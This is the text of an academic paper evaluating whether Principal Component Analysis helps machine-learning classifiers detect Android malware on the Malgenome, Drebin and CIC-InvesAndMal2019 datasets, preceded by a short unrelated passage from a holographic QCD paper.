susceptibility. For a discussion of the Wiedemann-Franz law, obtained by calculating the thermal and electrical conductivities up to LO in \(N\), together with the NLO-in-\(N\) corrections to the aforementioned transport coefficients and the speed of sound from gauge-invariant metric perturbations, see [30]. The glueball and meson spectra of finite-\(N\) QCD have been obtained in [22] and [19], respectively. The decay of glueballs into mesons (\(\pi\) and \(\rho\) mesons) has been discussed in [13], and for the QCD trace anomaly from an \(\mathcal{M}\)-theory perspective, see [31].
* **Summary of Applications of [3]**: The low-energy coupling constants at NLO in the chiral expansion of \(SU(3)\) chiral perturbation theory (for simplicity, in the chiral limit) were obtained from the aforementioned type IIA dual in [5], where we observed a _connection between higher derivative terms and the large-\(N\) expansion_. In the process of computing the deconfinement temperature (\(T_{c}\)) in [25, 32], a _novel "UV-IR" mixing, non-renormalization of \(T_{c}\) beyond one loop in the zero-instanton sector and a "Flavor Memory" effect_ were obtained. Further, we constructed a doubly holographic setup with a non-conformal bath in [28] to obtain the Page curve of the related eternal black hole from a top-down approach. One of the exciting results obtained in [28] is the Page curve of the relevant eternal black hole for massless gravity on the Karch-Randall brane. The massless graviton was responsible for the exponential-in-\(N\) suppressed entanglement entropy arising from higher derivative terms in the eleven-dimensional supergravity action. This provided us with the _connection between the mass of the graviton and higher derivative terms_. On the mathematical side, with the aim of classifying non-supersymmetric thermal geometries relevant to realistic top-down holographic duals of thermal QCD-like theories, \(SU(3)/G_{2}/SU(4)/Spin(7)\)-structures and (Almost) Contact (3) (Metric) Structures on the underlying six-, seven- and eight-folds were studied in [3] and [10].
2301.06031
A Review on the effectiveness of Dimensional Reduction with Computational Forensics: An Application on Malware Analysis
The Android operating system is pervasively adopted as the operating system platform of choice for smart devices. However, the strong adoption has also resulted in exponential growth in the number of Android based malicious software or malware. To deal with such cyber threats as part of cyber investigation and digital forensics, computational techniques in the form of machine learning algorithms are applied for such malware identification, detection and forensics analysis. However, such Computational Forensics modelling techniques are constrained by the volume, velocity, variety and veracity of the malware landscape. This in turn would affect their identification and detection effectiveness. Such consequences inherently raise the question of the sustainability of such a solution approach. One approach to optimise effectiveness is to apply dimensional reduction techniques like Principal Component Analysis with the intent to enhance algorithmic performance. In this paper, we evaluate the effectiveness of the application of Principal Component Analysis on the Computational Forensics task of detecting Android based malware. We applied our research hypothesis to three different datasets with different machine learning algorithms. Our research results showed that the dimensionally reduced datasets would result in a measure of degradation in accuracy performance.
Aye Thaw Da Naing, Justin Soh Beng Guan, Yarzar Shwe Win, Jonathan Pan
2023-01-15T07:34:31Z
http://arxiv.org/abs/2301.06031v1
# A Review on the effectiveness of Dimensional Reduction with Computational Forensics: An Application on Malware Analysis ###### Abstract The Android operating system is pervasively adopted as the operating system platform of choice for smart devices like smartphones, tablets, home appliances and Internet of Things (IoT) devices. However, the strong adoption has also resulted in exponential growth in the number of Android based malicious software or malware. Such malware typically embeds itself in its victims' devices and not only attacks those victims but also induces other targeted or collateral damage. To deal with such cyber threats as part of cyber investigation and digital forensics, computational techniques in the form of machine learning algorithms are applied for such malware identification, detection and forensics analysis. However, such Computational Forensics modelling techniques are constrained by the volume, velocity, variety and veracity of the malware landscape. This in turn would affect their identification and detection effectiveness. Such consequences inherently raise the question of the sustainability of such a solution approach. One approach to optimise effectiveness is to apply dimensional reduction techniques like Principal Component Analysis with the intent to enhance algorithmic performance. In this paper, we evaluate the effectiveness of the application of Principal Component Analysis on the Computational Forensics task of detecting Android based malware. We applied our research hypothesis to three different datasets with different machine learning algorithms. Our research results showed that the dimensionally reduced datasets would result in a measure of degradation in accuracy performance. ## 2 Author Keywords Principal Component Analysis (PCA), Computational Forensics, Android Malware. ## 3 Introduction The Android operating system (OS) continues to dominate the market share of mobile devices around the world. Android OS is widely used in automotive systems, IoT (Internet of Things) devices, home appliances and smart watches. Android powered mobile devices have enabled users to access internet-based communications, emails and social media without the need for computers (Kalkbrenner, J., et al 2011). The integration of mobile payment capabilities into smartphones provides users with digital mobile wallets and contactless payment (Bezovski, Zlatko et al., 2016, Slade, Emma et al., 2013). However, the threat of malware to Android OS has been growing over the past 10 years (Feizollah, Ali et al., 2017). To deal with the epidemiological spread of Android based malware, Google developed Google Play Protect to secure and scan all mobile app submissions for embedded malware (Sawers, P., 2020). However, despite this preemptive step to contain the malware spread, Android platforms are still exposed to malware infiltrations and infections. Hence, to contain this cyber epidemiological disaster, it is crucial that cyber investigators and digital forensics analysts using machine learning based classifiers have an effective means to deal with the volume, velocity, variety and veracity of malware. Most existing Android malware detection systems and frameworks can be categorized into three groups, namely, static analysis, dynamic analysis, followed by a hybrid of the two methods. Static analysis detects malware through source code permissions and intents, which allows fast detection.
Prior to installation, the APK application is dissected, with its content such as the AndroidManifest.xml and DEX (Dalvik Executable) files being analyzed to determine if it is malicious. However, modern Android malware employs code obfuscation techniques to evade static analysis (Abdullah Talha Kabakus et al., 2018). Dynamic analysis investigates the actual behavior and processes of a suspicious application in a real time environment to detect the presence of malware or malicious code. Dynamic analysis requires execution of the APK on an emulator or physical device, referred to as a sandbox, requiring a sizeable amount of processing power and time (Elsersy, Wael et al., 2022). The use of hybrid analysis has become common in recent years, with many frameworks combining static and dynamic analysis to characterize the behavior of malware (Abdullah Talha Kabakus et al., 2018, L. Taheri et al., 2019). Some researchers make use of Machine Learning algorithms to identify Android malware from benign software based on features from static, dynamic or hybrid analysis (Meghna Dhalaria et al, 2020). New methods of analysis which convert dissected APK files into datasets to perform classification have been deployed to improve malware classification (Y. Fang et al., 2020). Moreover, more and more studies have been done to find ways to improve Machine Learning models. One of the methods is utilizing dimensionality reduction methods such as Principal Component Analysis (PCA), Linear Discriminant Analysis (LDA) or T-Distributed Stochastic Neighbour Embedding (T-SNE). In our study, we evaluate the application of a dimensional reduction method, namely PCA, and evaluate the accuracy performance of machine learning classifier algorithms in detecting Android malware. In the next section, we cover the literature related to our research. This is followed by a description of the research experiment that we applied, including the datasets involved and the experimentation steps taken. An analysis of our research results follows, and we then close with our conclusion. ## 4 Literature Review There has been a growing number of Android malwares. According to Statista Research, as of March 2020, a total of 482,579 Android malware samples had been detected (statista.com, 2022). Various research has been done on the identification of Android malware based on static and dynamic analysis. Research on the effectiveness of dynamic analysis of Android intent features and Android permission features in Android malware detection had detection rates of 91% and 83% respectively, with a combination of both intent and permission features achieving a higher detection rate of 95.5% (Feizollah, Ali et al., 2017). Earlier research proposed the use of static analysis based solely on permissions, creating a probabilistic generative model for risk scoring (Peng, et al., 2012). Stowaway is a tool developed to detect over-privilege in Application Programming Interface (API) calls and to map these sets of API calls to permissions (Felt, Adrienne et al., 2011). Information on the permissions required by an Android application can be found in the AndroidManifest.xml file in the APK, which can be extracted using the AXMLPrinter2 tool (P. P. K. Chan et al., 2014). Unlike static analysis, which is vulnerable to code obfuscation, dynamic analysis monitors the artifacts generated by the executed APK in a physical phone or virtual environment (Feizollah, Ali et al., 2017).
Research has been conducted using the CICAndMal2017 dataset to generate network traffic on actual smartphones using a systematic approach rather than virtual emulators (Habibi Lashkarii et al., 2018). Machine learning (ML) classifiers such as Decision Tree (DT), Random Forest (RF), K-Nearest Neighbors (KNN), Naive Bayes (NB) and Support Vector Classifier (SVM) are common supervised learning algorithms used by researchers to perform both binary and family classification of malware (Noorbehbahani et al., 2019, Dhalaria, M et al., 2020, Sangal, Aviral et al., 2020, Abdullah, Talal et al., 2020). Research evaluating the performance of a permission feature dataset compared to a permission and API calls dataset used common ML classifiers that include Naive Bayes, Support Vector Machine (SVM), decision tree and Random Forest (RF) (P. P. K. Chan et al., 2014, S. E. Mohamed et al., 2021). These traditional ML classifiers are often used by researchers as baselines to compare against the performance of deep learning models and frameworks (M. Masum et al., 2019, El Fiky, A. H., 2020). Common evaluation metrics used by researchers include Accuracy, F1, Precision, Recall, True Positive Rate (TPR), False Positive Rate (FPR) and Area Under Curve (AUC). Researcher Samaneh Mahdavifar used a semi-supervised deep neural network algorithm to perform category classification of malware. In that work, the CICMalDroid2020 dataset was created, consisting of five categories of Android malware, namely Adware, Banking, SMS (Short Message Service), Riskware and Benign. Tools such as CuckooDroid and CopperDroid are commonly used to collect dynamic datasets of APKs (Mahdavifar, Samaneh et al., 2020, Dhalaria, M et al., 2020). Aside from ML, natural language processing algorithms have been used to extract ASCII strings from Android APKs. These were further processed into individual words, and this collection of words was then converted into lexical features. These feature vectors are then used as inputs to ML classifiers such as random forest and convolutional neural networks. The combination of these techniques was assessed to be effective in the detection of Android malware (Mimura, M., 2022). Feature selection techniques have typically been used to remove features that are not useful in the dataset in order to improve the accuracy of ML models (Fiky A. H. E., et al, 2021). Such techniques also improve processing time and prevent model over-fitting, hence resulting in models that are more robust and generalized. A common feature selection technique is the Information Gain (IG) technique, which ranks a feature by calculating its information gain. The need to process large volumes of data has also resulted in dimension reduction techniques gaining much attention. Testing ML classifiers with large datasets can be time consuming. Dimensionality reduction reduces high dimensional vector-valued explanatory variables while preserving their relationships in a low dimensional space (Zhang, T et al., 2018). Research has been done to explore other ways to improve processing time, including training ML classifiers with reduced datasets of smaller sizes based on random sampling and stratified random sampling. There has been some research on the application of PCA to the analysis of Android malware (D, Arivudainambi et al., 2019). Studies have also been conducted to compare the performance difference of dimension reduction techniques such as PCA and LDA (Durmus Ozkan Sahin et al., 2021).
Most of these studies do not make direct reference to experimental results from other literature or use different malware datasets to understand the benefits of PCA. The combination of PCA and the feature selection technique IG has been studied by researcher El Fiky (El Fiky, A. H., 2020) to create an optimized technique that reduces the total features by 89%. They tested with three baseline classifiers and managed to achieve good F-measure results with Random Forest. However, the combination of the Drebin and Malgenome datasets used in that research does not address the imbalanced nature of both datasets. The entire Drebin dataset contains 4.3% malware (Xu, Jiayun, et al, 2021). Both datasets have often been used by various researchers to develop frameworks to improve malware classification and detection (M. Masum et al., 2019, El Fiky, A. H., 2020). There is a need to investigate the impact of imbalanced datasets on Android malware detection research. More studies are needed to investigate the effects of dimensionality reduction techniques, feature selection techniques and dataset balancing on the accuracy of malware detection, hence the relevance of this research work. ## 5 Proposed Methodology ### Datasets The proposed methodology involves using three different datasets, namely CICInvesAndMal2019, Drebin and Android Malware Detection and Classification, for analysis and research. Dataset-1 used in our research is the Malgenome dataset. The dataset consists of 1260 Android malwares belonging to 49 malware families and 2539 benign APKs. The dataset has feature vectors of 215 attributes. Building the dataset took more than a year of reading through security blogs from existing anti-virus companies, lodging requests for samples and web crawling to obtain the malware samples (Y. Zhou et al., 2012). Due to limited resources, the authors stopped updating the dataset from 2015 onwards. However, other researchers further processed the dataset collection to extract the features by decompiling Android manifest files using the tool AXMLprinter2. API calls were also extracted using the Baksmali disassembler tool (S. Y. Yerima, 2019). Dataset-2 used in our research is the Drebin dataset initially created by the MobileSandbox project (M. Spreitzenbarth, 2013). It includes 5,560 malwares from 179 different malware families. The Drebin dataset includes data from static analysis such as the applications' manifest, dex code and permissions (D. Arp, 2014). In our experiments, we utilized the dataset extracted by S. Y. Yerima for their paper "DroidFusion: A Novel Multilevel Classifier Fusion Approach for Android Malware Detection" in 2019. This dataset includes 5,560 malwares and 9,476 benign apps. The dataset also uses 215 features and contains 2 classes to classify malware and benign. Dataset-3 used in our research is the CIC-InvesAndMal2019 dataset (Sangal, Aviral., 2020). The dataset was retrieved from the Canadian Institute for Cybersecurity. The dataset includes permissions and intents as static features, as well as API calls. The dataset has 5,491 collected samples with 426 malware and 5,065 benign. There are four malware classifications in the dataset: Adware, Ransomware, Scareware and SMS Malware. The following table summarises the datasets used in our research work. ### Methodology Our experiment involved replicating the software tools or Python development packages along with the machine learning parameters mentioned in the cited literature; a minimal illustrative sketch of the resulting evaluation pipeline is given below.
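(The following sketch is illustrative only and is not the authors' original code: it assumes a scikit-learn environment and a hypothetical pre-extracted feature file `malgenome_215.csv` with a binary 0/1 `class` column; the classifier choices and parameters are placeholders rather than the exact settings of any cited study.)

```python
# Illustrative sketch: PCA (retaining a target explained variance) followed by
# classification, evaluated with 10-fold cross validation.
import pandas as pd
from sklearn.decomposition import PCA
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import StratifiedKFold, cross_validate
from sklearn.ensemble import RandomForestClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn.linear_model import LogisticRegression

# Hypothetical file/column names; any table of extracted APK features with a
# 0/1 malware label would work here.
df = pd.read_csv("malgenome_215.csv")
X, y = df.drop(columns=["class"]), df["class"]

classifiers = {
    "RF": RandomForestClassifier(n_estimators=100, random_state=42),
    "kNN": KNeighborsClassifier(n_neighbors=5),
    "SVM": SVC(kernel="rbf", random_state=42),
    "LR": LogisticRegression(max_iter=1000),
}

cv = StratifiedKFold(n_splits=10, shuffle=True, random_state=42)
for name, clf in classifiers.items():
    pipe = Pipeline([
        ("scale", StandardScaler()),
        ("pca", PCA(n_components=0.95)),   # keep components explaining 95% of the variance
        ("clf", clf),
    ])
    scores = cross_validate(pipe, X, y, cv=cv, scoring=["accuracy", "f1"])
    print(f"{name}: acc={scores['test_accuracy'].mean():.4f} "
          f"f1={scores['test_f1'].mean():.4f}")
```

Wrapping PCA inside the Pipeline means the projection is re-fitted on each training fold only; the same pattern extends to the other metrics used later, for example `sklearn.metrics.fbeta_score` with `beta=10` for the Drebin comparison.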
For literature without detailed parameter information, we selected and tested the best parameters based on the nearest metrics. \begin{table} \begin{tabular}{|p{56.9pt}|p{56.9pt}|p{56.9pt}|p{56.9pt}|p{56.9pt}|} \hline Datasets & Number of samples & Number of malwares & Number of benign & Number of features \\ \hline Malgenome & 3799 & 1260 & 2539 & 215 \\ \hline Drebin & 15036 & 5560 & 9476 & 215 \\ \hline CIC-InvesAndMal2019 & 5,491 & 426 & 5,065 & 253 \\ \hline \end{tabular} \end{table} Table 1: Datasets and their samples Figure 1: Number of Malware and Benign Samples in Each Dataset Based on the three different datasets, we compared the test results from the cited literature with the results of the dataset processed with PCA prior to splitting it into train and test sets, to be used with the ML classifiers from the respective literature. Some of the research may contain specific data processing steps, which will be mentioned in the experiments and results. We apply K-fold cross validation to reduce bias when training and testing our models (Waziralli, R. et al., 2020). Most of the results are obtained with tenfold cross validation using WEKA and Python (S. Y. Yerima et al., 2019, Akintola A.G. et al., 2022, El Fiky, A. H., 2020). Based on the evaluation metrics, the performance of our ML classifiers was compared with the cited literature using the same datasets, to validate whether dimensionality reduction can be applied to Computational Forensics while achieving satisfactory results. ### Performance Evaluation Metrics Since the various pieces of literature use different evaluation metrics, our study is based on the multiple evaluation metrics used in the cited literature instead of a single common set of metrics. i. Accuracy measures the overall rate at which the model correctly predicts the label: \[Accuracy=\frac{TP+TN}{TP+FP+TN+FN}\] ii. F-score is the harmonic mean of both the recall (R) and precision (P) metrics. It is commonly used to evaluate the performance of a binary classification model. F-score can be computed as: \[Fscore=\frac{2\times TP}{2\times TP+FP+FN}\] The F-score can be generalized to the F-beta score, where beta is used to choose the weighting between precision and recall: \[F_{\beta}=(1+\beta^{2})\,\frac{\text{Precision}\times\text{Recall}}{(\beta^{2}\times\text{Precision})+\text{Recall}}\] iii. Precision measures the proportion of samples predicted as malware that are truly malware: \[Precision=\frac{TP}{TP+FP}\] iv. Recall measures how many of the actual malware samples are correctly identified: \[Recall=\frac{TP}{TP+FN}\] Figure 2: Proposed Approach Illustration ## 6 Results and Discussion In this section, we identified two pieces of literature for each dataset. To obtain comparable results for the ML classifiers used in past literature, we attempt to reproduce each experiment scenario. The dataset is then processed with PCA and passed into the ML classifiers. This is to ensure the reliability of our test results. ### Results From Malgenome Dataset We selected two relevant pieces of literature that used the Malgenome dataset. The first is Empirical Analysis of Forest Penalizing Attribute and Its Enhanced Variations for Android Malware by Akintola A.G., a journal article from MDPI (Akintola A.G. et al., 2022).
The second is Empirical Study on Intelligent Android Malware Detection based on Supervised Machine Learning by Abdullah T.A., published in IJACSA in the United Kingdom (Abdullah Talha Kabakus et al., 2018). The Malgenome dataset is commonly used in research on ML classifier performance, in studies on the effectiveness of intents, permissions and API calls in malware classification, and in the application of dimensionality reduction techniques to achieve high performance in ML algorithms with less computational resources (S. E. Mohamed et al., 2021). (Refer to Appendix Section 1 for the features breakdown). In the first literature, Akintola A.G. conducted an empirical study to validate the use of the Forest Penalizing Attribute (FPA) classifier, followed by enhanced FPA variants, to detect Android malware. In our study, we do not investigate the enhanced FPA variants. Figure 3 shows the baseline classifiers used to compare with FPA (Akintola A.G. et al., 2022). The synthetic minority oversampling technique, known as SMOTE, was used by Akintola A.G. to solve class imbalance issues found in the Malgenome dataset. Our research plan was to apply PCA to the Malgenome dataset and evaluate the resultant dataset using the performance evaluation metrics. To reproduce these results, we used WEKA and performed K-fold cross validation with k set to 10 folds. Apart from a \(+2\%\) improvement in accuracy for DETAB over Akintola A.G.'s results, most results are consistent. The NB kernel estimator parameter is set to True. (Refer to appendix Section 1 for Table 1 Original dataset Results) Figure 3: Baseline Classifiers used in Akintola research Figure 4 shows the top three algorithms before and after PCA. FPA performs the best among all the classifiers with the highest accuracy at 0.9894. (Refer to appendix section 1 Table 2 for PCA results) The accuracy increased by 0.002 for DETAB, dropped by 0.001 for ADT (Alternating Decision Tree) and dropped by 0.009 for FPA. We can see that PCA successfully reduced the number of features from 215 to 142 while continuing to achieve good results for these algorithms. In figure 5, we examine the algorithms with lower performance. While most classifiers have accuracy above 0.9, both CR (Conjunctive Rule) and DS (Decision Stump) had accuracy measurements below 0.8 before PCA. When PCA with a variance of 0.95 was applied, both NB and BN (BayesNet) suffered drops of 0.098 and 0.038. However, DS and CR improved by 0.140 and 0.145 respectively. Weak models such as DS and CR were unable to handle a large number of features in the dataset. As DS is a one level decision tree, the first few features of PCA managed to capture the majority of the variance in the dataset (Wayne Iba et al., 1992, J. Chandrasekaran, 2020). This gives the first feature of PCA more prediction power than the first feature in the original dataset. Figure 4: Top three algorithms before and after PCA Figure 5: Remaining algorithms before and after PCA Ensemble classifiers such as AdaBoost1 are often used to improve the accuracy of weak learners (J. Chandrasekaran, 2020). (Refer to appendix section 1 Table 2 for PCA results) Next, we proceeded to vary the amount of variance captured, starting from 0.85 in increments of 0.05 up to 0.99, to investigate the trend as the captured variance changes; a minimal sketch of this sweep is shown below. (Refer to appendix Table 3 for full results) At a variance of 0.85, both NB and BN suffered drops in accuracy of 0.099 and 0.022. This indicates that some of the important features may have been lost during dimension reduction (Durmus et al., 2021).
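(A minimal sketch of this explained-variance sweep, reusing the hypothetical `X`, `y` from the earlier snippet and scikit-learn rather than WEKA, might look as follows; it is illustrative only.)

```python
# Illustrative sketch: sweep the PCA explained-variance target and record
# cross-validated accuracy and F1 for a single classifier.
from sklearn.decomposition import PCA
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import StratifiedKFold, cross_validate
from sklearn.naive_bayes import GaussianNB

cv = StratifiedKFold(n_splits=10, shuffle=True, random_state=42)
for variance in (0.85, 0.90, 0.95, 0.99):
    pipe = Pipeline([
        ("scale", StandardScaler()),
        ("pca", PCA(n_components=variance)),
        ("clf", GaussianNB()),
    ])
    scores = cross_validate(pipe, X, y, cv=cv, scoring=["accuracy", "f1"])
    # Fit once on the full matrix just to report how many components survive.
    n_kept = PCA(n_components=variance).fit(StandardScaler().fit_transform(X)).n_components_
    print(f"variance={variance:.2f} components={n_kept} "
          f"acc={scores['test_accuracy'].mean():.4f} f1={scores['test_f1'].mean():.4f}")
```

Swapping `GaussianNB` for the other classifiers reproduces the per-algorithm curves discussed below.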
Varying the amount of variance explained from 0.85 to 0.99 exhibits negligible differences of about 0.001 in accuracy for most algorithms. DETAB accuracy and F-measure increased by 0.021 and 0.028 at PCA 0.85. Further increases in PCA from 0.85 to 0.99 did not contribute any improvement. To conclude, increasing the explained variance from 0.85 to 0.99 in general does not bring about significant improvements. NB does not perform well with the PCA dataset at any explained variance. (Refer to appendix Section 1 graph 1 for full results) The Malgenome dataset has class imbalance based on the proportion of benign and malware APKs. The imbalance ratio (IR) of benign to malware is 2.015. The Synthetic Minority Oversampling Technique, known as SMOTE, is often used to oversample the minority class (Durmus Ozkan Sahin et al., (2021), Chen, Zhenxiang et al., (2017)) to eliminate the class imbalance issue. Figure 6: F-measure and Accuracy graph at different explained variance Figure 7: Accuracy and F-measure results for PCA dataset with and without SMOTE Based on the data preprocessing details in the Akintola A.G. experiment, we randomized the dataset prior to the 70:30 split. SMOTE was applied to rebalance the training dataset, which was then used for 10-fold cross validation. Like Akintola A.G.'s findings, SMOTE improved the overall accuracy, F-measure, and AUC of most algorithms, with FPA also having a 31.25% improvement in FPR. Next, we performed PCA on the Malgenome dataset. We then performed a 70:30 split on the PCA dataset prior to applying SMOTE on the training dataset (a minimal sketch of this ordering is given below). Again, both NB and BN suffered a drop in accuracy while both DS and CR improved in accuracy (refer to appendix Section 1, Table 4 and graph 2 for the entire results). These results and behaviors were similar to applying PCA on the original dataset without performing SMOTE. PCA did not further improve the accuracy of the SMOTE results. In the second literature, Abdullah T.A. conducted a study on Android malware detection with six supervised ML classifiers. Two evaluation methods were used in that research, namely holdout validation with an 80% training, 20% testing dataset, and 10-fold cross validation. The 10-fold cross validation score was based on the mean score over all folds. Similar to Abdullah T.A., we used Jupyter notebook and Python 3.8. Figure 8 shows the parameters and models used in that literature. We managed to reproduce results close to the literature. In this section, we compared the performance of the classifiers based on Accuracy and F1-score. (Refer to appendix Section 1 Table 4 for test results). For PCA, we set the explained variance to 0.95. Based on figure 9, the accuracy of k-NN in holdout increased by 0.003 while 10-Fold resulted in a drop of 0.01. The F1-score saw an improvement for k-NN of 0.004 in holdout, while 10-Fold improved by 0.006. Decision Tree had an accuracy improvement of 0.004 in Holdout and a decrease in accuracy of 0.012 for 10-Fold. The F-measure also improved for Holdout by 0.04 but decreased by 0.012 in 10-Fold. Both SVM and LR saw an improvement in PCA results for both accuracy and F1-score. For SVM, accuracy increased by 0.005 for Holdout and 0.003 for 10-fold. For F1-score, it increased by 0.008 and 0.003. For LR, accuracy increased by 0.021 for Holdout and 0.009 for 10-fold. For F1-score, it increased by 0.017 and 0.013.
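(Referring back to the SMOTE experiment above, i.e. PCA applied first, then a 70:30 split, then SMOTE applied only to the training portion, a minimal sketch of that ordering could look as follows; it assumes the third-party imbalanced-learn package and the same hypothetical `X`, `y`, and simply mirrors the described procedure rather than the exact WEKA runs.)

```python
# Illustrative sketch: PCA -> 70:30 split -> SMOTE on the training portion only.
# Requires the third-party "imbalanced-learn" package (imported as imblearn).
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score, f1_score
from imblearn.over_sampling import SMOTE

# Following the described procedure, PCA is fitted on the full dataset before splitting.
X_pca = PCA(n_components=0.95).fit_transform(StandardScaler().fit_transform(X))
X_tr, X_te, y_tr, y_te = train_test_split(
    X_pca, y, test_size=0.30, stratify=y, random_state=42)

# Oversample the minority class in the training data only, so the held-out
# test set keeps its original (imbalanced) class distribution.
X_tr_bal, y_tr_bal = SMOTE(random_state=42).fit_resample(X_tr, y_tr)

clf = RandomForestClassifier(n_estimators=100, random_state=42)
clf.fit(X_tr_bal, y_tr_bal)
pred = clf.predict(X_te)
print(f"accuracy={accuracy_score(y_te, pred):.4f} f1={f1_score(y_te, pred):.4f}")
```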
In general, PCA successfully transformed and reduced the number of features in the Malgenome dataset from 215 to 142 components at 0.95 explained variance, while giving good results and even about 2% improvements for SVM and LR (bilinear). However, the NB algorithms had the worst performance. PCA generates negative feature values when centering the data, which causes an error for NB using the Multinomial model. We therefore switched from StandardScaler() to MinMaxScaler() to normalize the input values to between 0 and 1. The results drop significantly for NB using the Multinomial model: the F1-score drops by 0.414 and Accuracy by 0.289 for Holdout, and by 0.286 and 0.414 for 10-Fold. Figure 8: Parameters and Models used for HOLDOUT and 10-FOLD Figure 9: No PCA and PCA Accuracy and F-measure results for HOLDOUT & 10-FOLD Our AUC result for NB of 0.5 indicates that the NB model is not useful. (Refer to appendix Section 1 Table 6) Next, we proceeded to vary the explained variance from 0.85 in increments of 0.05 to 0.99 to investigate the performance of the classifiers as the explained variance increases. Most algorithms performed well based on Accuracy and F1-score despite PCA reducing the number of components. We removed NB from the overall graph as the model exhibits low performance with PCA. From figure 11, for k-NN, PCA improved the F1-score to 0.9876 with the explained variance set to 0.90. Further increases in explained variance saw a decrease in the F1-score. DT had the best F1-score of 0.98 without PCA. The best F1-score with PCA for DT was 0.9676 at an explained variance of 0.95. For SVM, the F1-score at an explained variance of 0.85 decreased to 0.9823 and then improved when the explained variance was increased. The peak F1-score was 0.9926. For RF, PCA at 0.85 initially decreased the F1-score to 0.9804 and it then peaked at 0.9926 when PCA was 0.90. Further increases in explained variance resulted in decreased performance. LR (bilinear) shows an increase in F1-score as the explained variance increased. The peak F1-score occurred at a PCA explained variance of 0.99. Based on the Accuracy graph, the trend with incremental increases in explained variance from 0.85 to 0.95 was identical to the F1-score for most classifiers apart from k-NN, where PCA did not have much impact on the accuracy. DT saw a decrease in accuracy of 0.0142 with the PCA dataset. A further increase in explained variance to 0.95 only saw an improvement of 0.0021. Due to the imbalanced nature of the Malgenome dataset, the F1-score, which balances Precision and Recall, is a more suitable evaluation metric than accuracy. Figure 11: Comparison of Accuracy and F1-score Results Based on Different PCA explained variance Figure 10: Accuracy and F1-score Results Based on Different PCA explained variance Based on our findings from both pieces of research for the Malgenome dataset, PCA successfully reduced the number of features from 215 to 98 at an explained variance of 0.85, which is a 54.4% reduction in features, while continuing to achieve good results for the FPA, ADT, k-NN, SVM, DETAB and LR algorithms. However, the Naive Bayes algorithm is not suitable for the PCA dataset as its AUC, the area under the receiver operating characteristic (ROC) curve, is 0.5, like tossing a coin. While the application of SMOTE on the unbalanced dataset did improve the Accuracy of NB (2.68%), BN (1.77%), CR (5.98%), DETAB (1.83%), ADT (0.13%), DS (4.23%) and FPA (-0.09%), the application of PCA to the Malgenome dataset followed by SMOTE did not improve the accuracy and F-measure. ### Results From Drebin-215 For the Drebin dataset, we chose two pieces of literature. In Suleiman Y.
Yerima's research, the authors studied 5 machine learning models and proposed the DroidFusion framework (S. Y. Yerima and S. Sezer, et al., 2019). Their ML results were compared to the results from the DroidFusion framework. For our study, we focused on applying PCA to the same 5 models and studied the results. To get accurate comparisons, we tried to achieve equivalent results by following the parameters mentioned in the research and using the same machine learning tool, which is WEKA. We used 10-fold cross-validation to validate the results. We set 4 different variances, R=0.85, R=0.9, R=0.95 and R=0.99, for PCA to compare the effect of variance on the datasets and models. The evaluation metrics of Precision M, Recall M, Precision B, Recall B and Weighted F-Measure were used for this study. Based on the results, the effects of different PCA R values were insignificant on J48. The difference was less than 1% and ranged from 0.969 to 0.971. On the other hand, increases in the PCA R value improved results for the Voted Perceptron classifier. When PCA's R value was 0.85, the weighted F measure of Voted Perceptron was 0.964, but when the R value was 0.99, the weighted F measure increased to 0.973. Other evaluation metrics also increased slightly when the R value was increased. As for the REPTree classifier, the best results were obtained when the R value was 0.85. When the R value was increased by 0.05, the results dropped slightly, but the results improved again when the R value was 0.95. However, when the R value was increased to 0.99, the results declined and became lower than the results when the R value was 0.85. These fluctuations show that over fitting or under fitting of features will not give the optimum results. As for Random Tree, two different models were used. We assumed that when the author mentioned Random Tree 100 and Random Tree 9, 100 and 9 are the parameters for the K value. The Random Tree-100 study illustrated that the best PCA R value for this model is 0.95. When R values of 0.90 and 0.99 were applied, the result metrics were almost the same and the lowest among all 4 different R value experiments. The second-best values resulted when the R value was 0.85. \begin{table} \begin{tabular}{|p{56.9pt}|p{56.9pt}|p{56.9pt}|p{56.9pt}|p{56.9pt}|p{56.9pt}|} \hline Classifier & PrecM & RecM & PrecB & RecB & W-FM \\ \hline J48 & 0.972 & 0.964 & 0.979 & 0.984 & 0.9766 \\ \hline REPTree & 0.976 & 0.951 & 0.972 & 0.986 & 0.9730 \\ \hline Random Tree-100 & 0.975 & 0.978 & 0.987 & 0.985 & 0.9824 \\ \hline Random Tree-9 & 0.947 & 0.971 & 0.983 & 0.968 & 0.9672 \\ \hline Voted Perceptron & 0.969 & 0.950 & 0.971 & 0.982 & 0.9701 \\ \hline \end{tabular} \end{table} Table 2: Results from cited literature In the second experiment for Random Tree, the K value was changed to 9. During this experiment, the results declined markedly when higher R values were applied. R=0.85 gave the best results and R=0.99 gave the lowest results. Except for the Voted Perceptron classifier, the rest of the models gave better results without PCA. As for Voted Perceptron, when a PCA R value of 0.99 was applied, the weighted F measure was slightly better than the original results. Additionally, all 4 experiments showed that the Precision and Recall values for Benign were higher than the Precision and Recall values for Malware. The difference was more significant in the Random Tree-9 model. The second dataset we had chosen was "Droid-NNet: Deep Learning Neural Network for Android Malware Detection", published in the IEEE International Conference on Big Data (Big Data), 2019.
This article proposed a deep neural network called "Droid-NNet" to detect malware. "Droid-NNet" was specifically modelled to detect malware in Android datasets. The literature also studied three traditional classification models, namely Decision Tree, Support Vector Machine (SVM) and Logistic Regression. The results were compared to illustrate the robustness and effectiveness of Droid-NNet (M. Masum and H. Shahriar, et al., 2019). Figure 12: Weighted F-Measure Results Figure 13: Precision and Recall Results Based on Different PCA R Values However, for our study, we have chosen the results from the traditional classification models to apply PCA. Python 3.8 and the scikit-learn library were used to collect the evaluation results. The results were validated using 10-fold cross-validation, and a standard scaler was used to scale the dataset. We also reused the same parameters used in the original paper: 'rbf' for the SVM kernel value, 'gini' for the Decision Tree criterion, and L2 for the Logistic Regression penalty. The evaluation metrics utilized are True Positive Rate (TPR), False Positive Rate (FPR) and F-beta score. The Drebin dataset has an unbalanced ratio of classes, and the accuracy of the results may not give an accurate representation of a model's performance. Thus, the F-beta score was used to determine the performance of the models (M. Masum and H. Shahriar, et al., 2019). To give more weight to recall, a beta value of 10 was used. We applied 4 values for R: 0.85, 0.90, 0.95 and 0.99. However, none of the R values gave better results compared to the original F-beta score. 